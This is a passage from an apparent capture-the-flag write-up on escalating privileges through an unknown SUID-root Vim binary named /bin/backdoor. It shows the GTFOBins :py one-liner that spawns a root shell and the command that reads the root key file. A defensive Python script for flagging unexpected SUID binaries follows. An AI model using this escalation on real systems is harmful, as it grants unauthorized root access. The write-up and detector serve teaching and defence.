-rwsr-xr-x. 1 root root 76K Mar 22 2017 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 2.1M Oct 2 2017 /bin/backdoor (Unknown SUID binary!)
-rwsr-xr-x. 1 root root 50K Mar 22 2017 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 36K Mar 22 2017 /bin/ping
-rwsr-xr-x. 1 root root 9.4K Mar 22 2017 /sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 34K Mar 22 2017 /sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 120K Mar 22 2017 /sbin/mount.nfs
SUID (/bin/backdoor) VIM
- https://gtfobins.github.io/gtfobins/vim/#suid
/bin/backdoor is not a path any stock CentOS package installs and, at 2.1M, it is far larger than every other SUID binary in the list, so it is the one to look at first. Running it with --help shows it is a SUID-root build of Vim 7.4, which GTFOBins covers. The :py payload only works because this Vim was built with Python support, and sh is started with -p so it keeps the effective UID 0 granted by the setuid bit instead of dropping back to apache.
sh
-rwsr-xr-x 1 root root 2.1M Oct 2 2017 /bin/backdoor (Unknown SUID binary!)
sh
bash-4.1$ /bin/backdoor --help
/bin/backdoor --help
VIM - Vi IMproved 7.4 (2013 Aug 10, compiled Dec 21 2016 17:06:34)
usage: vim [arguments] [file ..] edit specified file(s)
or: vim [arguments] - read text from stdin
or: vim [arguments] -t tag edit file where tag is defined
or: vim [arguments] -q [errorfile] edit file with first error
sh
/bin/backdoor -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
sh
sh-4.1# whoami
whoami
root
sh-4.1# cat /root/key.txt
cat /root/key.txt
tutvxmoli5yun0zcqmq9
sh-4.1# date
date
Wed Feb 12 21:41:25 EST 2025
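The way /bin/backdoor stood out in the SUID listing can be turned into a repeatable check. The script below is an added example, not from the writeup or from linpeas: it parses ls -l style lines such as the ones linpeas printed, keeps the SUID-root entries, and reports those missing from a baseline or larger than a size limit. The sample listing is a subset of the output above; the baseline is an assumption that stands in for a clean CentOS 6 install or an rpm -qf / rpm -V check, which would be the authoritative source on a real engagement.

```python
"""Added example, not from the writeup or from linpeas: triage of an
``ls -l``-style SUID listing. SAMPLE_LISTING is a subset of the page's
output; BASELINE is an assumed allow-list of expected SUID-root paths."""
import re

LINE_RE = re.compile(
    r"^(?P<mode>[-dlrwxsStT]{10})\.?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>[\d.]+[KMG]?)\s+\S+\s+\d+\s+\d{4}\s+(?P<path>/\S+)"
)
UNITS = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}

SAMPLE_LISTING = """\
-rwsr-x--- 1 root dbus 49K Apr 22 2015 /lib/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root 35K May 10 2016 /usr/bin/newgrp ---> HP-UX_10.20
---s--x--x. 1 root root 124K Jun 22 2017 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 abrt abrt 9.4K Mar 23 2017 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache ---> CENTOS
-rwsr-xr-x. 1 root root 34K Mar 22 2017 /bin/su
-rwsr-xr-x 1 root root 2.1M Oct 2 2017 /bin/backdoor (Unknown SUID binary!)
-rwsr-xr-x. 1 root root 36K Mar 22 2017 /bin/ping
"""

# Assumed baseline: what a clean install is expected to carry as SUID root.
BASELINE = {
    "/lib/dbus-1/dbus-daemon-launch-helper",
    "/usr/bin/newgrp",
    "/usr/bin/sudo",
    "/bin/su",
    "/bin/ping",
}


def parse_size(text: str) -> int:
    """Turn ls -lh sizes such as '9.4K' or '2.1M' into bytes."""
    m = re.fullmatch(r"([\d.]+)([KMG]?)", text)
    if not m:
        raise ValueError(f"bad size: {text}")
    return int(float(m.group(1)) * UNITS[m.group(2)])


def parse_line(line: str):
    """Parse one listing line; None for lines that are not file entries."""
    m = LINE_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["size"] = parse_size(entry["size"])
    # Fourth mode character: 's' = setuid + exec, 'S' = setuid without exec.
    entry["setuid"] = entry["mode"][3] in "sS"
    return entry


def triage(listing: str, baseline: set[str], size_limit: int = 1024 * 1024):
    """Return (unexpected, oversized): SUID-root paths not in the baseline,
    and SUID-root paths above size_limit. A multi-megabyte SUID binary is
    unusual for system utilities and typical of a smuggled editor or
    interpreter, which is exactly what /bin/backdoor turned out to be."""
    unexpected, oversized = [], []
    for line in listing.splitlines():
        entry = parse_line(line)
        if not entry or not entry["setuid"] or entry["owner"] != "root":
            continue
        if entry["path"] not in baseline:
            unexpected.append(entry["path"])
        if entry["size"] > size_limit:
            oversized.append(entry["path"])
    return unexpected, oversized


if __name__ == "__main__":
    unexpected, oversized = triage(SAMPLE_LISTING, BASELINE)
    print("not in baseline:", unexpected)
    print("oversized      :", oversized)
```

On the target itself the same question is answered with `rpm -qf /bin/backdoor`, which reports that no package owns the file; the parsing approach is for working from a captured linpeas log after the fact.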